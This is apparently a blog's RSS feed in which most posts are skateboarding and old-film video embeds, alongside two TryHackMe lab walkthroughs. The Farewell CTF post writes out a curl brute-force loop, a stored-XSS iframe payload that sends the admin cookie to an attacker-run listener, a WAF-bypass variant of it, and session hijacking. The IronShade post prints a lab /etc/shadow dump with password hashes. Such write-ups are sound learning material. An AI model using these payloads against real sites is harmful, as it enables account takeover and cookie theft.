<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>64mm Skateboarding Vlog</title>
	<atom:link href="https://64mm.com/feed/" rel="self" type="application/rss+xml"/>
	<link>https://64mm.com</link>
	<description>The first and best skateboarding videocast on the net. &lt;a href="http://www.podshow.com/"&gt; Podshow PDN &lt;/a&gt; {podshow-cd1818c2ca823bb7009e5c2064d8d51d} &lt;a href="http://odeo.com/claim/feed/d234e0d061fef6fb"&gt;My Odeo Channel&lt;/a&gt; (odeo/d234e0d061fef6fb)</description>
	<lastBuildDate>Wed, 11 Mar 2026 20:28:20 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://64mm.com/wp-content/uploads/2019/06/apple-touch-icon-150x150.png</url>
	<title>64MM</title>
	<link>https://64mm.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<itunes:explicit>no</itunes:explicit><copyright>2006 64MM</copyright><itunes:image href="http://www.64mm.com/title2.jpg"/><itunes:keywords>64mm,skateboarding,Colorado,videolog,skate,video,Denver</itunes:keywords><itunes:summary>64mm skateboarding videos, skateboarding program related activities and mayhem.</itunes:summary><itunes:subtitle>64mm skateboarding videos, skateboarding program related activities and mayhem.</itunes:subtitle><itunes:category text="Sports &amp; Recreation"><itunes:category text="Outdoor"/></itunes:category><itunes:category text="TV &amp; Film"/><itunes:category text="Sports &amp; Recreation"/><itunes:author>64MM</itunes:author><itunes:owner><itunes:email>csw64mm@gmail.com</itunes:email><itunes:name>64MM</itunes:name></itunes:owner><item>
		<title>Get Serious About Your Web Site</title>
		<link>https://64mm.com/get-serious-about-your-web-site/</link>
		
		
		<pubDate>Wed, 11 Mar 2026 20:28:16 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1241</guid>

					<description><![CDATA[Let GEL LLC Provide You With all Your Internet Needs We offer world class products and services for hosting, domains, email, marketing, and security. Check it out&#160;HERE.]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image"><img decoding="async" src="https://64mm.com/wp-content/uploads/2019/06/cropped-cropped-apple-touch-icon-2.png" alt=""/></figure>



<p class="has-text-align-center has-large-font-size"><strong>Let GEL LLC Provide You With all Your Internet Needs</strong></p>



<p class="has-text-align-center has-large-font-size">We offer world class products and services for hosting, domains, email, marketing, and security.</p>



<p class="has-text-align-center has-large-font-size">Check it out&nbsp;<a href="https://store.geteventlog.com/">HERE</a>.</p>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>TryHackMe – IronShade</title>
		<link>https://64mm.com/tryhackme-ironshade/</link>
		
		
		<pubDate>Sun, 01 Feb 2026 18:48:25 +0000</pubDate>
				<category><![CDATA[CyberSec]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Words]]></category>
		<category><![CDATA[cycbersec]]></category>
		<category><![CDATA[IronShade]]></category>
		<category><![CDATA[THM]]></category>
		<category><![CDATA[walkthrough]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1213</guid>

					<description><![CDATA[Walkthrough of the IronShade TryHackMe challenge. https://tryhackme.com/room/ironshade Linux Challenge Incident Scenario Based on the threat intel report received, an infamous hacking group,&#160;IronShade,&#160;has been observed targeting&#160;Linux&#160;servers across the region. Our team had set up a&#160;honeypot&#160;and exposed weak&#160;SSH&#160;and ports to get attacked by the&#160;APT&#160;group and understand their attack patterns.&#160; You are provided with one of the compromised&#160;Linux&#160;servers. [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Walkthrough of the IronShade TryHackMe challenge. <a href="https://tryhackme.com/room/ironshade">https://tryhackme.com/room/ironshade</a></p>



<p>Linux Challenge</p>



<p><em>Incident Scenario</em></p>



<p><em>Based on the threat intel report received, an infamous hacking group,&nbsp;<strong>IronShade</strong>,&nbsp;has been observed targeting&nbsp;Linux&nbsp;servers across the region. Our team had set up a&nbsp;honeypot&nbsp;and exposed weak&nbsp;SSH&nbsp;and ports to get attacked by the&nbsp;APT&nbsp;group and understand their attack patterns.&nbsp;</em></p>



<p><em>You are provided with one of the compromised&nbsp;Linux&nbsp;servers. Your task as a Security Analyst is to perform a thorough compromise assessment on the&nbsp;Linux&nbsp;server and identify the attack footprints. Some threat reports indicate that one indicator of their attack is creating a backdoor account for&nbsp;persistence.</em></p>



<figure class="wp-block-image size-full is-resized"><img fetchpriority="high" decoding="async" width="302" height="278" src="https://64mm.com/wp-content/uploads/2026/02/ironsh.png" alt="" class="wp-image-1214" style="width:226px;height:auto" srcset="https://64mm.com/wp-content/uploads/2026/02/ironsh.png 302w, https://64mm.com/wp-content/uploads/2026/02/ironsh-300x276.png 300w" sizes="(max-width: 302px) 100vw, 302px" /></figure>



<p>Challenge</p>



<p>Investigate the server and identify the footprints left behind after the exploitation.</p>



<div class="wp-block-group alignfull"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow">
<div class="wp-block-group alignfull author-introduction-pattern" style="margin-top:0;margin-bottom:0;padding-top:var(--wp--preset--spacing--superbspacing-xxlarge);padding-right:var(--wp--preset--spacing--superbspacing-small);padding-bottom:var(--wp--preset--spacing--superbspacing-xxlarge);padding-left:var(--wp--preset--spacing--superbspacing-small)"><div class="wp-block-group__inner-container is-layout-constrained wp-container-core-group-is-layout-93f2ba14 wp-block-group-is-layout-constrained">
<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-container-core-group-is-layout-53acd6ed wp-block-group-is-layout-constrained">
<ol class="wp-block-list">
<li>What is the Machine ID of the machine we are investigating?</li>
</ol>



<figure class="wp-block-image size-full"><img decoding="async" width="597" height="268" src="https://64mm.com/wp-content/uploads/2026/02/image.png" alt="" class="wp-image-1217" srcset="https://64mm.com/wp-content/uploads/2026/02/image.png 597w, https://64mm.com/wp-content/uploads/2026/02/image-300x135.png 300w" sizes="(max-width: 597px) 100vw, 597px" /></figure>



<ol start="2" class="wp-block-list">
<li class="has-small-font-size">What backdoor user account was created on the server?<br>root@cybertees:/home/ubuntu# cat /etc/shadow<br>root:<em>:18561:0:99999:7::: daemon:</em>:18561:0:99999:7:::<br>bin:<em>:18561:0:99999:7::: sys:</em>:18561:0:99999:7:::<br>sync:<em>:18561:0:99999:7::: games:</em>:18561:0:99999:7:::<br>man:<em>:18561:0:99999:7::: lp:</em>:18561:0:99999:7:::<br>mail:<em>:18561:0:99999:7::: news:</em>:18561:0:99999:7:::<br>uucp:<em>:18561:0:99999:7::: proxy:</em>:18561:0:99999:7:::<br>www-data:<em>:18561:0:99999:7::: backup:</em>:18561:0:99999:7:::<br>list:<em>:18561:0:99999:7::: irc:</em>:18561:0:99999:7:::<br>gnats:<em>:18561:0:99999:7::: nobody:</em>:18561:0:99999:7:::<br>systemd-network:<em>:18561:0:99999:7::: systemd-resolve:</em>:18561:0:99999:7:::<br>systemd-timesync:<em>:18561:0:99999:7::: messagebus:</em>:18561:0:99999:7:::<br>syslog:<em>:18561:0:99999:7::: _apt:</em>:18561:0:99999:7:::<br>tss:<em>:18561:0:99999:7::: uuidd:</em>:18561:0:99999:7:::<br>tcpdump:<em>:18561:0:99999:7::: sshd:</em>:18561:0:99999:7:::<br>landscape:<em>:18561:0:99999:7::: pollinate:</em>:18561:0:99999:7:::<br>ec2-instance-connect:!:18561:0:99999:7:::<br>systemd-coredump:!!:19050::::::<br>ubuntu:!$6$dLobQ2F0caobSv1W$xeAAh1v5GE7irQ3fFFMjZtV.P83VQL0yiJKLkebZ63hUqs2dVJF6ub35xNDjG08Aq6f3MPxH7lnuCpc.gQBxb.:19769:0:99999:7:::<br>lxd:!:19050::::::<br>kernoops:<em>:19050:0:99999:7::: lightdm:</em>:19050:0:99999:7:::<br>whoopsie:<em>:19050:0:99999:7::: dnsmasq:</em>:19050:0:99999:7:::<br>avahi-autoipd:<em>:19050:0:99999:7::: usbmux:</em>:19050:0:99999:7:::<br>rtkit:<em>:19050:0:99999:7::: avahi:</em>:19050:0:99999:7:::<br>cups-pk-helper:<em>:19050:0:99999:7::: geoclue:</em>:19050:0:99999:7:::<br>pulse:<em>:19050:0:99999:7::: speech-dispatcher:!:19050:0:99999:7::: saned:</em>:19050:0:99999:7:::<br>nm-openvpn:<em>:19050:0:99999:7::: colord:</em>:19050:0:99999:7:::<br>hplip:<em>:19050:0:99999:7::: gdm:</em>:19050:0:99999:7:::<br>fwupd-refresh:*:19769:0:99999:7:::<br>mircoservice:$6$mEUXWPTdSz8Epwbf$aNeUyqOBPXuhkIx50hPMA3q07kjnZh8g7jcwxt2KR/IBEmMaGgxBFc8DLH2DIkgSqAWTAmAKLYOh.AotTTrP7.:19940:0:99999:7:::    &lt;&#8212; Correct answer</li>
</ol>



<p>3. What is the cronjob that was set up by the attacker for persistence?</p>



<figure class="wp-block-image size-full"><img decoding="async" width="628" height="632" src="https://64mm.com/wp-content/uploads/2026/02/image-1.png" alt="" class="wp-image-1218" srcset="https://64mm.com/wp-content/uploads/2026/02/image-1.png 628w, https://64mm.com/wp-content/uploads/2026/02/image-1-298x300.png 298w, https://64mm.com/wp-content/uploads/2026/02/image-1-150x150.png 150w" sizes="(max-width: 628px) 100vw, 628px" /></figure>
</div></div>



<ol class="wp-block-list">
<li>Examine the running processes on the machine. Can you identify the suspicious-looking hidden process from the backdoor account?</li>
</ol>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="139" src="https://64mm.com/wp-content/uploads/2026/02/image-2.png" alt="" class="wp-image-1219" srcset="https://64mm.com/wp-content/uploads/2026/02/image-2.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-2-300x67.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>How many processes are found to be running from the backdoor account’s directory?</li>
</ul>



<p>If you count the running processes in the figure above, we see <strong>2</strong> running processes.</p>



<ul class="wp-block-list">
<li>What is the name of the hidden file in memory from the root directory?</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="246" src="https://64mm.com/wp-content/uploads/2026/02/image-9.png" alt="" class="wp-image-1226" srcset="https://64mm.com/wp-content/uploads/2026/02/image-9.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-9-300x118.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>What suspicious services were installed on the server? Format is service a, service b in alphabetical order.</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="202" src="https://64mm.com/wp-content/uploads/2026/02/image-6.png" alt="" class="wp-image-1223" srcset="https://64mm.com/wp-content/uploads/2026/02/image-6.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-6-300x97.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="120" src="https://64mm.com/wp-content/uploads/2026/02/image-4.png" alt="" class="wp-image-1221" srcset="https://64mm.com/wp-content/uploads/2026/02/image-4.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-4-300x58.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>Examine the logs; when was the backdoor account created on this infected system?</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="61" src="https://64mm.com/wp-content/uploads/2026/02/image-3.png" alt="" class="wp-image-1220" srcset="https://64mm.com/wp-content/uploads/2026/02/image-3.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-3-300x29.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<p>There’s also a new user named “badactor” that seems suspicious.</p>



<ul class="wp-block-list">
<li>From which IP address were multiple SSH connections observed against the suspicious backdoor account?</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="118" src="https://64mm.com/wp-content/uploads/2026/02/image-5.png" alt="" class="wp-image-1222" srcset="https://64mm.com/wp-content/uploads/2026/02/image-5.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-5-300x57.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>How many failed SSH login attempts were observed on the backdoor account?</li>
</ul>



<p><strong>8</strong></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="97" src="https://64mm.com/wp-content/uploads/2026/02/image-7.png" alt="" class="wp-image-1224" srcset="https://64mm.com/wp-content/uploads/2026/02/image-7.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-7-300x47.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>Which malicious package was installed on the host?</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="316" src="https://64mm.com/wp-content/uploads/2026/02/image-8.png" alt="" class="wp-image-1225" srcset="https://64mm.com/wp-content/uploads/2026/02/image-8.png 624w, https://64mm.com/wp-content/uploads/2026/02/image-8-300x152.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<ul class="wp-block-list">
<li>What is the secret code found in the metadata of the suspicious package?</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="975" height="64" src="https://64mm.com/wp-content/uploads/2026/02/image-10.png" alt="" class="wp-image-1227" srcset="https://64mm.com/wp-content/uploads/2026/02/image-10.png 975w, https://64mm.com/wp-content/uploads/2026/02/image-10-300x20.png 300w, https://64mm.com/wp-content/uploads/2026/02/image-10-768x50.png 768w" sizes="auto, (max-width: 975px) 100vw, 975px" /></figure>
</div></div>
</div></div>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>TryHackMe – Farewell CTF Walkthrough</title>
		<link>https://64mm.com/tryhackme-farewell-ctf-walkthrough/</link>
		
		
		<pubDate>Sat, 31 Jan 2026 20:53:25 +0000</pubDate>
				<category><![CDATA[CyberSec]]></category>
		<category><![CDATA[farewell ctf]]></category>
		<category><![CDATA[tryhackme]]></category>
		<category><![CDATA[walkthrough]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1160</guid>

					<description><![CDATA[Try Hack Me – Farewell CTF TryHackMe.com has some great capture the flag exercises on their site. In this posting I will go though the Farewell room. The farewell server will be decommissioned in less than 24 hours. Everyone is asked to leave one last message, but the admin panel holds all submissions. Can you [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p class="has-black-color has-text-color has-link-color wp-elements-7d2080ea6cf20d2992b4decd125d7227">Try Hack Me – Farewell CTF</p>



<p class="has-black-color has-text-color has-link-color wp-elements-14026695e941a67465f568ca2f63bcc7">TryHackMe.com has some great capture the flag exercises on their site. In this posting I will go though the <a href="https://tryhackme.com/room/farewell">Farewell</a> room.</p>



<p class="has-black-color has-text-color has-link-color wp-elements-a82bde1b80941ee52850c7df717774ed"><em>The farewell server will be decommissioned in less than 24 hours. Everyone is asked to leave one last message, but the admin panel holds all submissions. Can you sneak into the admin area and read every farewell message before the lights go out?</em></p>



<p>Note: In case you want to start over or restart all services, visit&nbsp;http://10.66.143.32/status.php.</p>



<p>This is a vulnerable web application created with two core weaknesses:</p>



<ol class="wp-block-list">
<li>Stored XSS on an admin reviewed message service</li>



<li>Weak API exposure</li>
</ol>



<p>I used the following enumeration actions:</p>



<ol class="wp-block-list">
<li>Gobuster</li>



<li>Brute force</li>



<li>XSS payload</li>



<li>WAF bypass</li>



<li>Final exploit</li>
</ol>



<h2 class="wp-block-heading">Here’s what we see when we load the page.</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="449" height="306" src="https://64mm.com/wp-content/uploads/2026/01/image-1.png" alt="" class="wp-image-1162" srcset="https://64mm.com/wp-content/uploads/2026/01/image-1.png 449w, https://64mm.com/wp-content/uploads/2026/01/image-1-300x204.png 300w" sizes="auto, (max-width: 449px) 100vw, 449px" /></figure>



<p>The site has:</p>



<ol class="wp-block-list">
<li>Login with username/password</li>



<li>User-submitted Farewell message</li>



<li>admin login</li>
</ol>



<p>This recent activity banner shows 3 users, who are active on the platform:</p>



<ul class="wp-block-list">
<li>adam</li>



<li>nora</li>



<li>deliver11</li>
</ul>



<p>Let’s try a non-existent user and we get “invalid username or password” error message.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="337" height="221" src="https://64mm.com/wp-content/uploads/2026/01/image.png" alt="" class="wp-image-1161" srcset="https://64mm.com/wp-content/uploads/2026/01/image.png 337w, https://64mm.com/wp-content/uploads/2026/01/image-300x197.png 300w" sizes="auto, (max-width: 337px) 100vw, 337px" /></figure>



<p>Now we can try a valid user and we get a different error message “Server hint: invalid password against the user” (weak sauce).</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="346" height="245" src="https://64mm.com/wp-content/uploads/2026/01/image-2.png" alt="" class="wp-image-1163" srcset="https://64mm.com/wp-content/uploads/2026/01/image-2.png 346w, https://64mm.com/wp-content/uploads/2026/01/image-2-300x212.png 300w" sizes="auto, (max-width: 346px) 100vw, 346px" /></figure>



<h2 class="wp-block-heading">Now, we’ll run gobuster to discover directories.</h2>



<p>(kali㉿kali)-[~]<br>└─$ gobuster dir -u http://10.66.143.32/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php </p>



<p>Gobuster v3.8<br>by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</p>



<p>[+] Url: http://10.66.143.32/<br>[+] Method: GET<br>[+] Threads: 10<br>[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt<br>[+] Negative Status codes: 404<br>[+] User Agent: gobuster/3.8<br>[+] Extensions: php<br>[+] Timeout: 10s</p>



<p>/index.php (Status: 200) [Size: 5246]<br>/info.php (Status: 200) [Size: 87570]<br>/admin.php (Status: 403) [Size: 780]<br>/status.php (Status: 200) [Size: 3467]<br>/javascript (Status: 301) [Size: 317] [&#8211;&gt; http://10.66.143.32/javascript/]<br>/logout.php (Status: 302) [Size: 0] [&#8211;&gt; index.php]<br>/auth.php (Status: 403) [Size: 780]<br>/dashboard.php (Status: 302) [Size: 0] [&#8211;&gt; /]</p>



<p>Going to info.php we see this. The site can be used for XSS if the cookie is HttpOnly.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="162" src="https://64mm.com/wp-content/uploads/2026/01/image-3.png" alt="" class="wp-image-1164" srcset="https://64mm.com/wp-content/uploads/2026/01/image-3.png 624w, https://64mm.com/wp-content/uploads/2026/01/image-3-300x78.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<h2 class="wp-block-heading">Now we’ll run Burpsuite and capture login requests.</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="299" src="https://64mm.com/wp-content/uploads/2026/01/image-9.png" alt="" class="wp-image-1172" srcset="https://64mm.com/wp-content/uploads/2026/01/image-9.png 624w, https://64mm.com/wp-content/uploads/2026/01/image-9-300x144.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<p>The response to the login request for user Deliver11 shows a “password_hint” parameter that reads: ”Capital of Japan followed by 4 digits.”</p>



<p>Here are the other three user captures:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="246" src="https://64mm.com/wp-content/uploads/2026/01/image-6.png" alt="" class="wp-image-1169" srcset="https://64mm.com/wp-content/uploads/2026/01/image-6.png 624w, https://64mm.com/wp-content/uploads/2026/01/image-6-300x118.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="239" src="https://64mm.com/wp-content/uploads/2026/01/image-8.png" alt="" class="wp-image-1171" srcset="https://64mm.com/wp-content/uploads/2026/01/image-8.png 624w, https://64mm.com/wp-content/uploads/2026/01/image-8-300x115.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="243" src="https://64mm.com/wp-content/uploads/2026/01/image-7.png" alt="" class="wp-image-1170" srcset="https://64mm.com/wp-content/uploads/2026/01/image-7.png 624w, https://64mm.com/wp-content/uploads/2026/01/image-7-300x117.png 300w" sizes="auto, (max-width: 624px) 100vw, 624px" /></figure>



<p>The easiest password hint is for deliver11, Tokyo + 4 digits. We could try to brute force a guess of the four digits with Burp Intruder or ffuf, but that would probably trigger the WAF. Let’s use a shell script to check.</p>



<p></p>



<p>#!/bin/bash</p>



<p>for i in {0000..9999}; do<br>pass=&#8221;Tokyo$i&#8221;<br>echo &#8220;[+] Trying $pass&#8221;<br>res=$(curl -s -X POST &#8220;http://10.22.155.72/index.php&#8221; \ -d &#8220;username=deliver11&amp;pass<br>word=$pass&#8221;)<br>echo &#8220;$res&#8221; | grep -q &#8216;&#8221;success&#8221;: true&#8217; &amp;&amp; echo &#8220;[FOUND] $pass&#8221; &amp;&amp; break<br>done</p>



<p>After getting the password I logged into deliver11’s account and was given the first flag.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="517" height="341" src="https://64mm.com/wp-content/uploads/2026/01/image.jpg" alt="" class="wp-image-1165" srcset="https://64mm.com/wp-content/uploads/2026/01/image.jpg 517w, https://64mm.com/wp-content/uploads/2026/01/image-300x198.jpg 300w" sizes="auto, (max-width: 517px) 100vw, 517px" /></figure>



<p>I also had the ability to send a message that would be approved by admin.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="323" height="393" src="https://64mm.com/wp-content/uploads/2026/01/image-5.png" alt="" class="wp-image-1168" srcset="https://64mm.com/wp-content/uploads/2026/01/image-5.png 323w, https://64mm.com/wp-content/uploads/2026/01/image-5-247x300.png 247w" sizes="auto, (max-width: 323px) 100vw, 323px" /></figure>



<p>I then tried a basic &lt;script&gt;alert()&lt;/script&gt;&nbsp;XSS payload to see if XSS was an option, but that was caught by the pesky WAF.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="423" height="109" src="https://64mm.com/wp-content/uploads/2026/01/image-11.png" alt="" class="wp-image-1174" srcset="https://64mm.com/wp-content/uploads/2026/01/image-11.png 423w, https://64mm.com/wp-content/uploads/2026/01/image-11-300x77.png 300w" sizes="auto, (max-width: 423px) 100vw, 423px" /></figure>



<p>Then I tried an iframe to trigger JS.&nbsp; &lt;iframe&nbsp;src=&#8221;javascript:location=&#8217;//10.64.105.110:8000/&#8217;+document.cookie&#8221;&gt;&nbsp;and that was also caught by the WAF.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="423" height="110" src="https://64mm.com/wp-content/uploads/2026/01/image-4.png" alt="" class="wp-image-1166" srcset="https://64mm.com/wp-content/uploads/2026/01/image-4.png 423w, https://64mm.com/wp-content/uploads/2026/01/image-4-300x78.png 300w" sizes="auto, (max-width: 423px) 100vw, 423px" /></figure>



<p>We will modify the iframe to work.</p>



<p>&lt;iframe&nbsp;src=&#8221;java&amp;#115;cript:location=&#8217;//10.64.105.110:8000/&#8217;+top[&#8216;doc&#8217;+&#8217;ument&#8217;][&#8216;coo&#8217;+&#8217;kie&#8217;]&#8221;&gt;</p>



<p>On the attack box I stared a listener. root@ip-10-64-105-110:~# python3 -m http.server 8000</p>



<p>Logged into the “Farewell server” as deliver11, and sent this in the message box.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="323" height="393" src="https://64mm.com/wp-content/uploads/2026/01/image-5.png" alt="" class="wp-image-1167" srcset="https://64mm.com/wp-content/uploads/2026/01/image-5.png 323w, https://64mm.com/wp-content/uploads/2026/01/image-5-247x300.png 247w" sizes="auto, (max-width: 323px) 100vw, 323px" /></figure>



<p>Which gave me the PHPSESSID.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="411" height="188" src="https://64mm.com/wp-content/uploads/2026/01/image-12.png" alt="" class="wp-image-1175" srcset="https://64mm.com/wp-content/uploads/2026/01/image-12.png 411w, https://64mm.com/wp-content/uploads/2026/01/image-12-300x137.png 300w" sizes="auto, (max-width: 411px) 100vw, 411px" /></figure>



<p>I then copied and pasted the admin PHPSESSHID into the cookies section of Inspect, Storage, and refreshed the admin.php screen to get the final flag.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="504" height="367" src="https://64mm.com/wp-content/uploads/2026/01/image-10.png" alt="" class="wp-image-1173" srcset="https://64mm.com/wp-content/uploads/2026/01/image-10.png 504w, https://64mm.com/wp-content/uploads/2026/01/image-10-300x218.png 300w" sizes="auto, (max-width: 504px) 100vw, 504px" /></figure>



<p>By using [&#8216;doc&#8217;+&#8217;ument&#8217;][&#8216;coo&#8217;+&#8217;kie&#8217;] in the place of document.cookie we were able to bypass the WAF and get the admin cookie.</p>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>Sucker</title>
		<link>https://64mm.com/sucker/</link>
		
		
		<pubDate>Sat, 05 Apr 2025 18:11:01 +0000</pubDate>
				<category><![CDATA[Video]]></category>
		<category><![CDATA[1947]]></category>
		<category><![CDATA[fascist]]></category>
		<category><![CDATA[film]]></category>
		<category><![CDATA[Prelinger]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1148</guid>

					<description><![CDATA[1947 Prelinger film about fascism.]]></description>
										<content:encoded><![CDATA[
<p>1947 Prelinger film about fascism.</p>



<p> </p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Don&#039;t Be a Sucker" width="640" height="480" src="https://www.youtube.com/embed/XpF55vur0sE?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>Banjo &amp; Bass</title>
		<link>https://64mm.com/banjo-bass/</link>
		
		
		<pubDate>Sat, 01 Mar 2025 17:39:28 +0000</pubDate>
				<category><![CDATA[Music]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[banjo]]></category>
		<category><![CDATA[bass]]></category>
		<category><![CDATA[picking]]></category>
		<category><![CDATA[skatopia]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1143</guid>

					<description><![CDATA[A musical interlude from Skatopia.]]></description>
										<content:encoded><![CDATA[
<p>A musical interlude from Skatopia.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Banjo and Bass" width="640" height="360" src="https://www.youtube.com/embed/YBDXdG3eTWA?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>Despotism</title>
		<link>https://64mm.com/despotism/</link>
		
		
		<pubDate>Sat, 01 Mar 2025 17:27:07 +0000</pubDate>
				<category><![CDATA[Video]]></category>
		<category><![CDATA[despotism]]></category>
		<category><![CDATA[happening]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1139</guid>

					<description><![CDATA[1946 school film about despotism.]]></description>
										<content:encoded><![CDATA[
<p>1946 school film about despotism.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Despotism" width="640" height="480" src="https://www.youtube.com/embed/idhcwIP5Kfo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>Rip It Up</title>
		<link>https://64mm.com/rip-it-up/</link>
		
		
		<pubDate>Mon, 17 Feb 2025 22:54:35 +0000</pubDate>
				<category><![CDATA[Skate]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[go]]></category>
		<category><![CDATA[skate]]></category>
		<category><![CDATA[video]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1130</guid>

					<description><![CDATA[Skate.]]></description>
										<content:encoded><![CDATA[
<p>Skate.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Rip It Up" width="640" height="360" src="https://www.youtube.com/embed/Mm46kKmpHbg?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
